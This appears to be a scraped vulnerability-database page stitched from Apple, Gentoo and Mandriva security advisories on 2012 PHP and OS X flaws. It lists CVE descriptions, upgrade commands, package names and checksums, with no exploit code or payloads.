10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4, OS X Mountain Lion v10.8 and v10.8.1 Impact: Multiple vulnerabilities in PHP Description: >PHP is updated to version 5.3.15 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2012-0831 CVE-2012-1172 CVE-2012-1823 CVE-2012-2143 CVE-2012-2311 CVE-2012-2386 CVE-2012-2688 PHP Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: PHP scripts which use libpng may be vulnerable to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of PNG files. This issue was addressed by updating PHP's copy of libpng to version 1.5.10. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3048 Profile Manager Available for: OS X Lion Server v10.7 to v10.7.4 Impact: An unauthenticated user could enumerate managed devices Description: An authentication issue existed in the Device Management private interface. This issue was addressed by removing the interface. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3721 : Derick Cassidy of XEquals Corporation QuickLook Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted .pict file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of .pict files. This issue was addressed through improved validation of .pict files. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the Qualys Vulnerability & Malware Research Labs (VMRL) QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in QuickTime's handling of sean atoms. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft) working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access existed in the handling of Sorenson encoded movie files. This issue was addressed through improved memory initialization. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3722 : Will Dormann of the CERT/CC QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of RLE encoded movie files. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative Ruby Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. The Ruby OpenSSL module disabled the 'empty fragment' countermeasure which prevented these attacks. This issue was addressed by enabling empty fragments. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3389 USB Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Attaching a USB device may lead to an unexpected system termination or arbitrary code execution Description: A memory corruption issue existed in the handling of USB hub descriptors. This issue was addressed through improved handling of the bNbrPorts descriptor field. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3723 : Andy Davis of NGS Secure Note: OS X Mountain Lion v10.8.2 includes the content of Safari 6.0.1. For further details see "About the security content of Safari 6.0.1" at http://http//support.apple.com/kb/HT5502 OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update 2012-004 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 or Security Update 2012-004. For OS X Mountain Lion v10.8.1 The download file is named: OSXUpd10.8.2.dmg Its SHA-1 digest is: d6779e1cc748b78af0207499383b1859ffbebe33 For OS X Mountain Lion v10.8 The download file is named: OSXUpdCombo10.8.2.dmg Its SHA-1 digest is: b08f10233d362e39f20b69f91d1d73f5e7b68a2c For OS X Lion v10.7.4 The download file is named: MacOSXUpd10.7.5.dmg Its SHA-1 digest is: e0a9582cce9896938a7a541bd431862d93893532 For OS X Lion v10.7 and v10.7.3 The download file is named: MacOSXUpdCombo10.7.5.dmg Its SHA-1 digest is: f7a26b164fa10dae4fe646e57b01c34a619c8d9b For OS X Lion Server v10.7.4 The download file is named: MacOSXServerUpd10.7.5.dmg Its SHA-1 digest is: a891b03bfb4eecb745c0c39a32f39960fdb6796a For OS X Lion Server v10.7 and v10.7.3 The download file is named: MacOSXServerUpdCombo10.7.5.dmg Its SHA-1 digest is: df6e1748ab0a3c9e05c890be49d514673efd965e For Mac OS X v10.6.8 The download file is named: SecUpd2012-004.dmg Its SHA-1 digest is: 5b136e29a871d41012f0c6ea1362d6210c8b4fb7 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-004.dmg Its SHA-1 digest is: 9b24496be15078e58a88537700f2f39c112e3b28 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJQWhlbAAoJEPefwLHPlZEwwjwQAKrpQlZh1B2mkSTLxR7QZg6e Qm7SmIZL9sjl5gQkTxoAvOGxJ8uRdYPlJ1IpyU/MbK0GqO53KmFSeKkwCnvLKMaW pc6tiFaQ4zV4LEAwBAFEuqCsMyPEJqKDhYXl2cHQmWfAlrLCyCKfzGLy2mY2UnkE DQC2+ys70DChFv2GzyXlibBXAGMKDygJ5dVKynsi1ceZLYWbUJoGwlUtXPylBpnO QyGWXmEloPbhK6HJbKMNacuDdVcb26pvIeFiivkTSxPVlZ3ns2tAwEyvHrzA9O4n 7rQ6jvfDbguOZmM5sPFvVKBw2GVDBNU+G3T8ouIXhk6Pjhr4in8VFCb8MIMLb8hm 7YYn2z1TzKTNmUuYbwe6ukQvf57cPuW0bAvslbl6PgrzqorlNPU4rDoSvPrJx/RO BOYkcxfirevHDGibfkeqXPjL3h+bVrb1USZpAv+ZOAy0M89SHFcvMtpAhxnoGiV5 w4EyKB+9Yi/CSAk2Ne3Y5kHH7/v3pWV68aJwhVirya7ex3vnJ+M+lRLKSm2BUjL3 +9fykrJBDujFDXoCmK5CN5Wx36DSVZ4VO1h635crotudtcvd+LQ2VHma/Chav5wK q5SSllf4KEownpx6o/qTxpg5tcC4lvgTcsDHlYcNq2s8KTTjmOden8ar4h7M7QD2 xyBfrQfG/dsif6jGHaot =8joH -----END PGP SIGNATURE-----

sapi/cgi/cgi_main.c in PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to cause a denial of service (resource consumption) by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'T' case. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-1823. PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PHP: Multiple vulnerabilities Date: September 24, 2012 Bugs: #384301, #396311, #396533, #399247, #399567, #399573, #401997, #410957, #414553, #421489, #427354, #429630 ID: 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in PHP, the worst of which lead to remote execution of arbitrary code. Background ========== PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/php < 5.3.15 >= 5.3.15 < 5.4.5 >= 5.4.5 ------------------------------------------------------------------- # Package 1 only applies to users of these architectures: arm Description =========== Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All PHP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15" All PHP users on ARM should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5" References ========== [ 1 ] CVE-2011-1398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398 [ 2 ] CVE-2011-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379 [ 3 ] CVE-2011-4566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566 [ 4 ] CVE-2011-4885 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885 [ 5 ] CVE-2012-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057 [ 6 ] CVE-2012-0788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788 [ 7 ] CVE-2012-0789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789 [ 8 ] CVE-2012-0830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830 [ 9 ] CVE-2012-0831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831 [ 10 ] CVE-2012-1172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172 [ 11 ] CVE-2012-1823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823 [ 12 ] CVE-2012-2143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143 [ 13 ] CVE-2012-2311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311 [ 14 ] CVE-2012-2335 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335 [ 15 ] CVE-2012-2336 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336 [ 16 ] CVE-2012-2386 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386 [ 17 ] CVE-2012-2688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688 [ 18 ] CVE-2012-3365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365 [ 19 ] CVE-2012-3450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201209-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Please refer to the following Mandriva advisories for further information: MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180, MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1148 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1657 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2202 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3182 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3267 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3268 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0788 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0830 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0831 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1172 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336 http://www.mandriva.com/security/advisories?name=MDVA-2012:004 http://www.mandriva.com/security/advisories?name=MDVSA-2011:165 http://www.mandriva.com/security/advisories?name=MDVSA-2011:166 http://www.mandriva.com/security/advisories?name=MDVSA-2011:180 http://www.mandriva.com/security/advisories?name=MDVSA-2011:197 http://www.mandriva.com/security/advisories?name=MDVSA-2012:065 http://www.mandriva.com/security/advisories?name=MDVSA-2012:068 http://www.mandriva.com/security/advisories?name=MDVSA-2012:068-1 _______________________________________________________________________ Updated Packages: Mandriva Enterprise Server 5: 7361d218b400b6601eef5465f0c132f1 mes5/i586/apache-mod_php-5.3.13-0.1mdvmes5.2.i586.rpm 23194f266a0a18c9d49fa7760f6d75f7 mes5/i586/lemon-3.7.4-0.1mdvmes5.2.i586.rpm ee51be362aff5c90c587650c52e5d874 mes5/i586/libmbfl1-1.1.0-0.1mdvmes5.2.i586.rpm 0cd89098cc20b5ce8acb14d6f6ddc748 mes5/i586/libmbfl-devel-1.1.0-0.1mdvmes5.2.i586.rpm dedab7019ea9edfeb929fa521191fe09 mes5/i586/libming1-0.4.4-0.1mdvmes5.2.i586.rpm 881df3313a40b7113d0b2c4d39349c4a mes5/i586/libming-devel-0.4.4-0.1mdvmes5.2.i586.rpm a09e59b16f2c4fe4a583b65689f0f308 mes5/i586/libmonetra7-7.0.4-0.1mdvmes5.2.i586.rpm 1cdd454b9561c94253a4d885a1f34370 mes5/i586/libmonetra-devel-7.0.4-0.1mdvmes5.2.i586.rpm 90dcdd87fb687327fd687e490be5fc7b mes5/i586/libphp5_common5-5.3.13-0.1mdvmes5.2.i586.rpm cc8e259df098747e849797194711dff1 mes5/i586/libsphinxclient0-0.9.9-0.1mdvmes5.2.i586.rpm 716d1d5539c4a4eaac5996c70578107d mes5/i586/libsphinxclient-devel-0.9.9-0.1mdvmes5.2.i586.rpm b271fe2d863cb99d46f99a20c0cab5d3 mes5/i586/libstemmer0-0-5.1mdvmes5.2.i586.rpm f08df937c8cbc104c32a0b42f77a2b2d mes5/i586/libstemmer-devel-0-5.1mdvmes5.2.i586.rpm fc04b1140795dafb3a280100a34e1698 mes5/i586/libxmlrpc-epi0-0.54-0.1mdvmes5.2.i586.rpm ed22bcef35a1b90090a01d5bdf5c2861 mes5/i586/libxmlrpc-epi-devel-0.54-0.1mdvmes5.2.i586.rpm 3c70ce8653099b8bede16e1d4b1c854c mes5/i586/libyaz3-3.0.48-0.1mdvmes5.2.i586.rpm d73a3220c42f40c085c1caa3a1797b9a mes5/i586/libyaz-devel-3.0.48-0.1mdvmes5.2.i586.rpm 8cd9158f64b8d1345e47485ab28b8f87 mes5/i586/ming-utils-0.4.4-0.1mdvmes5.2.i586.rpm ec6c990e242c299eb3f250a273298534 mes5/i586/perl-SWF-0.4.4-0.1mdvmes5.2.i586.rpm c199e39972b4633c025cdb4497f866d5 mes5/i586/php-apc-3.1.10-0.1mdvmes5.2.i586.rpm 4d7b2a7efea30875044fa27ab621855f mes5/i586/php-apc-admin-3.1.10-0.1mdvmes5.2.i586.rpm b86186ed13e27f5dde58b58e799f9145 mes5/i586/php-bcmath-5.3.13-0.1mdvmes5.2.i586.rpm 364fb5e17d6f35aeb212e374f8408236 mes5/i586/php-bz2-5.3.13-0.1mdvmes5.2.i586.rpm 64367f635bddcdb8f799f30bd56db615 mes5/i586/php-calendar-5.3.13-0.1mdvmes5.2.i586.rpm 040288301616bfb16436f2e5a341ff9f mes5/i586/php-cgi-5.3.13-0.1mdvmes5.2.i586.rpm 3c265959950263674c5017eda963117e mes5/i586/php-cli-5.3.13-0.1mdvmes5.2.i586.rpm 42876a7aead3c2ba20de3b237502d317 mes5/i586/php-ctype-5.3.13-0.1mdvmes5.2.i586.rpm 9ae84a482bced4724fc5b2719a5f7e74 mes5/i586/php-curl-5.3.13-0.1mdvmes5.2.i586.rpm fb39ca8bc9b3e70dca9eabeb43f1b5a3 mes5/i586/php-dba-5.3.13-0.1mdvmes5.2.i586.rpm eb9cd33f04b6b8ce9631dbee6ffdfa1c mes5/i586/php-dbx-1.1.0-30.2mdvmes5.2.i586.rpm 4a289a7a64702fc7bf9167125f172274 mes5/i586/php-devel-5.3.13-0.1mdvmes5.2.i586.rpm fc09a56f707392c32ef3aeec9a1bb242 mes5/i586/php-dio-0.0.5-0.1mdvmes5.2.i586.rpm 521e2447d98a8d37aa7fb2fa35787ef2 mes5/i586/php-doc-5.3.13-0.1mdvmes5.2.i586.rpm 6e0fed6e1c0b5ee5a11645e4956d345c mes5/i586/php-dom-5.3.13-0.1mdvmes5.2.i586.rpm 5e9298f4d04acef2d164c52697e911eb mes5/i586/php-eaccelerator-0.9.6.1-0.6mdvmes5.2.i586.rpm 688d1e19c4955521d7a217bd64b1a3aa mes5/i586/php-eaccelerator-admin-0.9.6.1-0.6mdvmes5.2.i586.rpm c7ba6857a141dbac85afa4f05cdb65ca mes5/i586/php-enchant-5.3.13-0.1mdvmes5.2.i586.rpm 0c179177f51deb368800f0c08cedc599 mes5/i586/php-exif-5.3.13-0.1mdvmes5.2.i586.rpm 39f6318d1367c28e8c0365098e7750e4 mes5/i586/php-fam-5.0.1-3.6mdvmes5.2.i586.rpm 1ef9b6263948c34f46b5fd29321d911c mes5/i586/php-fileinfo-5.3.13-0.1mdvmes5.2.i586.rpm aad86d693bbe62bba0942b370f6ca246 mes5/i586/php-filepro-5.1.6-13.6mdvmes5.2.i586.rpm 3868021d3e61c00b8ae6809bb7c0900b mes5/i586/php-filter-5.3.13-0.1mdvmes5.2.i586.rpm 48b88e31e42379400dc7766ad2c62e5a mes5/i586/php-fpm-5.3.13-0.1mdvmes5.2.i586.rpm f8cd704030d7d70ea8ebe8346f9f0e0f mes5/i586/php-ftp-5.3.13-0.1mdvmes5.2.i586.rpm 7c32f002b04ac8072df7aa7fa8b7a8e6 mes5/i586/php-gd-5.3.13-0.1mdvmes5.2.i586.rpm df5a2a2b26101a778494b26af67766a2 mes5/i586/php-gettext-5.3.13-0.1mdvmes5.2.i586.rpm 8327f44ffa0b41841ff9b71039017d52 mes5/i586/php-gmp-5.3.13-0.1mdvmes5.2.i586.rpm 811259cfad20fd63253a7123b7fd27dc mes5/i586/php-gtk2-2.0.1-2.2mdvmes5.2.i586.rpm be58ace4d69b596b57afd068f7cf3c49 mes5/i586/php-hash-5.3.13-0.1mdvmes5.2.i586.rpm a17c44ceea8b3f5a0bc55a3af3474af3 mes5/i586/php-iconv-5.3.13-0.1mdvmes5.2.i586.rpm c89f28160eaf77c3655965bfbed6c3b1 mes5/i586/php-imagick-3.0.1-0.2mdvmes5.2.i586.rpm 73fa2e549e58fd68ad8a9109c77a7369 mes5/i586/php-imap-5.3.13-0.1mdvmes5.2.i586.rpm b3c413082301b0a8f4a25f176a87a45e mes5/i586/php-ini-5.3.13-0.1mdvmes5.2.i586.rpm 6c775dd0ca5396b0ebb70e602db834b6 mes5/i586/php-intl-5.3.13-0.1mdvmes5.2.i586.rpm 5902f72d9bc4f0c025618cd49e5f8e79 mes5/i586/php-json-5.3.13-0.1mdvmes5.2.i586.rpm 877dc6caffd8bbe76c654ac4a9d18daa mes5/i586/php-ldap-5.3.13-0.1mdvmes5.2.i586.rpm abe1393ef623af8944406dadd8064c89 mes5/i586/php-mailparse-2.1.6-0.1mdvmes5.2.i586.rpm 0f498f237e44a451224929ecd24b315c mes5/i586/php-mbstring-5.3.13-0.1mdvmes5.2.i586.rpm 35eceb3b8e39847fa00a91409afe9407 mes5/i586/php-mcal-0.6-23.6mdvmes5.2.i586.rpm 385e71ffb5612c05a701ed557e556c62 mes5/i586/php-mcrypt-5.3.13-0.1mdvmes5.2.i586.rpm 18e3385588deda52c3516375d6d803d0 mes5/i586/php-mcve-7.0.3-0.2mdvmes5.2.i586.rpm daf72900f0a90864046a67a2d71e6caa mes5/i586/php-mdbtools-1.0.0-4.2mdvmes5.2.i586.rpm d0905f31f721643a572bf6b005262bf6 mes5/i586/php-memcache-3.0.6-0.2mdvmes5.2.i586.rpm 6b5378f95fb1022c83d34c9db1422d8e mes5/i586/php-ming-5.2.10-0.2mdvmes5.2.i586.rpm 8e6e4f7017a0febfef7cdf155ecc4962 mes5/i586/php-mssql-5.3.13-0.1mdvmes5.2.i586.rpm 0411daf7561b179eb5a8e484d36f4ad3 mes5/i586/php-mysql-5.3.13-0.1mdvmes5.2.i586.rpm ff31716a2c412fba2e9d013c56965cf7 mes5/i586/php-mysqli-5.3.13-0.1mdvmes5.2.i586.rpm 993a888b1c2713a00565e45282b23148 mes5/i586/php-mysqlnd-5.3.13-0.1mdvmes5.2.i586.rpm 08fbe9fae6d67c0637041c80f07eba12 mes5/i586/php-odbc-5.3.13-0.1mdvmes5.2.i586.rpm 7a29e566a7751e1821a623a4f0018a6f mes5/i586/php-openssl-5.3.13-0.1mdvmes5.2.i586.rpm f441f06ada4ee980d501e2b6576f2806 mes5/i586/php-optimizer-0.1-0.alpha2.0.2mdvmes5.2.i586.rpm b8da69bd634b1daa981efbc2ed95a648 mes5/i586/php-pcntl-5.3.13-0.1mdvmes5.2.i586.rpm 95089b116c79922e497d4fd7854df544 mes5/i586/php-pdo-5.3.13-0.1mdvmes5.2.i586.rpm 2f2196f900c6b802cf7fea375c9eeb91 mes5/i586/php-pdo_dblib-5.3.13-0.1mdvmes5.2.i586.rpm 25c438a18c01c09b60e7c7b2fe13671f mes5/i586/php-pdo_mysql-5.3.13-0.1mdvmes5.2.i586.rpm 91f1fee5243ed4ae8398a75e9114adac mes5/i586/php-pdo_odbc-5.3.13-0.1mdvmes5.2.i586.rpm bfff4547a91207f42302cd9fc184f86f mes5/i586/php-pdo_pgsql-5.3.13-0.1mdvmes5.2.i586.rpm 8d460754542459d816d1b3dff39c872b mes5/i586/php-pdo_sqlite-5.3.13-0.1mdvmes5.2.i586.rpm 9ff947c66182403b9888b265832c9161 mes5/i586/php-perl-1.0.0-32.2mdvmes5.2.i586.rpm cb1bca793338e4e792ab6c8792293617 mes5/i586/php-pgsql-5.3.13-0.1mdvmes5.2.i586.rpm 1ef789ec5d683fef4934fc57101456b1 mes5/i586/php-phar-5.3.13-0.1mdvmes5.2.i586.rpm 52145842d6faa93fa073fa17cb3b0763 mes5/i586/php-posix-5.3.13-0.1mdvmes5.2.i586.rpm aed79d1522b7507df309ddd682a99b4d mes5/i586/php-pspell-5.3.13-0.1mdvmes5.2.i586.rpm 7cf0cf423041e29370ec6df0da70d21e mes5/i586/php-radius-1.2.5-7.2mdvmes5.2.i586.rpm f53c0be9c38ddf42a8c6820a312eaa06 mes5/i586/php-readline-5.3.13-0.1mdvmes5.2.i586.rpm 29ee9c49f78cb11e83f9a251bd02b7e9 mes5/i586/php-recode-5.3.13-0.1mdvmes5.2.i586.rpm 2c8c33fd81fc8468d0ddb774c2814264 mes5/i586/php-sasl-0.1.0-21.6mdvmes5.2.i586.rpm 8c2471fa96a43e94edabd4b9668724ef mes5/i586/php-session-5.3.13-0.1mdvmes5.2.i586.rpm 3ca8b754f64883be1924fa8e95e799d3 mes5/i586/php-shmop-5.3.13-0.1mdvmes5.2.i586.rpm faa1b493b705f393754abcc2174857b5 mes5/i586/php-snmp-5.3.13-0.1mdvmes5.2.i586.rpm c393eb8db265798b1beff2541d13ee25 mes5/i586/php-soap-5.3.13-0.1mdvmes5.2.i586.rpm c23958451e7f49cb90e18f0d58fde045 mes5/i586/php-sockets-5.3.13-0.1mdvmes5.2.i586.rpm 419a7ecf0f1d44a08795cc21c88f3b17 mes5/i586/php-sphinx-1.2.0-0.1mdvmes5.2.i586.rpm b42c41d30364c4bb308146ab5087fabf mes5/i586/php-sqlite3-5.3.13-0.1mdvmes5.2.i586.rpm 6e9609d6fd4724426a63e3e520341051 mes5/i586/php-sqlite-5.3.13-0.1mdvmes5.2.i586.rpm e0b0e03c3ba4746805a70f3749784af7 mes5/i586/php-ssh2-0.11.3-0.1mdvmes5.2.i586.rpm f3be55d6857f3c36f063a418ff780c01 mes5/i586/php-suhosin-0.9.33-0.1mdvmes5.2.i586.rpm 49ab75a66171482bc0c92da727b42790 mes5/i586/php-sybase_ct-5.3.13-0.1mdvmes5.2.i586.rpm a49fe633e4d2eb4acb1fcd9ded4afff6 mes5/i586/php-sysvmsg-5.3.13-0.1mdvmes5.2.i586.rpm e548f18c2ccd5522376387fb9895e605 mes5/i586/php-sysvsem-5.3.13-0.1mdvmes5.2.i586.rpm 079ffcc8e9bbcf02d70b39aed0e37510 mes5/i586/php-sysvshm-5.3.13-0.1mdvmes5.2.i586.rpm a0bfac8555bfaefec8cdab4a8fe8f759 mes5/i586/php-tclink-3.4.5-0.2mdvmes5.2.i586.rpm c3bb9c496c70fa477b65a326f10f1f13 mes5/i586/php-tidy-5.3.13-0.1mdvmes5.2.i586.rpm 92fa5b22a77b38c94e1e81cee27e94e5 mes5/i586/php-timezonedb-2012.3-0.1mdvmes5.2.i586.rpm c69e34969e6be01c229701cb3bd381f3 mes5/i586/php-tokenizer-5.3.13-0.1mdvmes5.2.i586.rpm 86d0fa4af4c00f2a996ee86c7480eaec mes5/i586/php-translit-0.6.1-0.1mdvmes5.2.i586.rpm 11aa119fde6b2c43e93259784d78b72a mes5/i586/php-vld-0.11.1-0.1mdvmes5.2.i586.rpm f48532222388b41b6f5abbeffa704cf9 mes5/i586/php-wddx-5.3.13-0.1mdvmes5.2.i586.rpm 1770351942d2fb1c5685afe0609d22ea mes5/i586/php-xattr-1.1.0-2.6mdvmes5.2.i586.rpm 09300dd1170f00c70d05a21017d05448 mes5/i586/php-xcache-1.3.2-0.1mdvmes5.2.i586.rpm 508c5edb557c8bc20d7084b314278944 mes5/i586/php-xcache-admin-1.3.2-0.1mdvmes5.2.i586.rpm 41e91f88a9fdaf1fa0420ae01dc46ade mes5/i586/php-xdebug-2.1.4-0.1mdvmes5.2.i586.rpm c8d6da8bdb753cf7a2a6db3d3e2e46bf mes5/i586/php-xml-5.3.13-0.1mdvmes5.2.i586.rpm 50aed2d093b83fdaa77dc407da9b861a mes5/i586/php-xmlreader-5.3.13-0.1mdvmes5.2.i586.rpm fe32252d37699afb0c51f60f9722adcb mes5/i586/php-xmlrpc-5.3.13-0.1mdvmes5.2.i586.rpm a1a2181cb93d31acf2c6b6e246b9db0d mes5/i586/php-xmlwriter-5.3.13-0.1mdvmes5.2.i586.rpm f87097cce5a501146df0e7120211c4bd mes5/i586/php-xsl-5.3.13-0.1mdvmes5.2.i586.rpm 9d5c99b04a85caea9bce01f4c662372c mes5/i586/php-yaz-1.1.1-0.1mdvmes5.2.i586.rpm d38eb4445d09878793e8506f1b649236 mes5/i586/php-zip-5.3.13-0.1mdvmes5.2.i586.rpm ec0cbe2b90c8fb0db9939d10e62fef02 mes5/i586/php-zlib-5.3.13-0.1mdvmes5.2.i586.rpm e2fe6c46edade8b149063316fb6e9268 mes5/i586/python-SWF-0.4.4-0.1mdvmes5.2.i586.rpm aef4719c148c3f6edf549f236a08868e mes5/i586/sphinx-0.9.9-0.1mdvmes5.2.i586.rpm 48b1928235704dd977b9fdc25f1e2933 mes5/i586/stemwords-0-5.1mdvmes5.2.i586.rpm 1b7636ca4c1ec6eac492041c6e9c95e2 mes5/i586/yaz-3.0.48-0.1mdvmes5.2.i586.rpm 2bac0388ad669fc836a910cb6919733e mes5/SRPMS/apache-mod_php-5.3.13-0.1mdvmes5.2.src.rpm 0dd8c597a6a39e17b504408fa4f894d1 mes5/SRPMS/lemon-3.7.4-0.1mdvmes5.2.src.rpm 04a50458044ddef8dca4acbecd0555d1 mes5/SRPMS/libmbfl-1.1.0-0.1mdvmes5.2.src.rpm d9e473396af964f01dd6310844925396 mes5/SRPMS/libmonetra-7.0.4-0.1mdvmes5.2.src.rpm 0fafe53fccc11afa4b75c66dc49261cd mes5/SRPMS/libstemmer-0-5.1mdvmes5.2.src.rpm 6de1878b7ff4fbc0b63e381618e966ba mes5/SRPMS/ming-0.4.4-0.1mdvmes5.2.src.rpm c4041cade9aaf6c4c67f046e4bfbaa74 mes5/SRPMS/php-5.3.13-0.1mdvmes5.2.src.rpm c0a1c69bca172f69a034505cfd6b37fc mes5/SRPMS/php-apc-3.1.10-0.1mdvmes5.2.src.rpm df8c3520a450cb4209179f60cf8828cd mes5/SRPMS/php-dbx-1.1.0-30.2mdvmes5.2.src.rpm 